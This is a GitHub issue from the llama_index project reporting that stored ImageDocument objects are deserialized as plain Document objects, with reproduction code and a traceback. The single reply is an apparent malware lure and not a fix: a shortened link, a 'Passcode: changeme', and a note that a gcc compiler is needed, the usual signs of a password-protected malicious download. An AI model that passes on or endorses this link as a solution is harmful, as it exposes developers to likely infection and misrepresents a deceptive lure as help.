### ISSUE TITLE
[Bug]: Incorrect deserialization for ImageDocument objects

### ISSUE THREAD

**Issue by Nitro963** [run-llama/llama_index#15856]
### Bug Description

Stored image documents can never be retrieved as `ImageDocument` from any document store due to the incorrect deserialization logic of `json_to_doc` helper function in `llama_index.core.storage.docstore.utils` module.

### Version

0.11.2

### Steps to Reproduce

```python
from llama_index.core.storage.docstore import SimpleDocumentStore
from llama_index.core.schema import ImageDocument

store = SimpleDocumentStore()
image_doc = ImageDocument(
    image_url="https://venturebeat.com/wp-content/uploads/2024/03/Screenshot-2024-03-04-at-12.49.41%E2%80%AFAM.png",
)

store.add_documents([
    image_doc
])

doc_from_store = store.get_document(image_doc.doc_id)

print(doc_from_store.image_url)
```

As the document is going to be retrieved as `Document` object we can't access `image_url` and will result in a `AttributeError` Exception

### Relevant Logs/Tracbacks

```shell
Traceback (most recent call last):
  File "/server_code/playground.py", line 15, in <module>
    print(doc_from_store .image_url)
          ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/pydantic/main.py", line 811, in __getattr__
    raise AttributeError(f'{type(self).__name__!r} object has no attribute {item!r}')
AttributeError: 'Document' object has no attribute 'image_url'
```

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
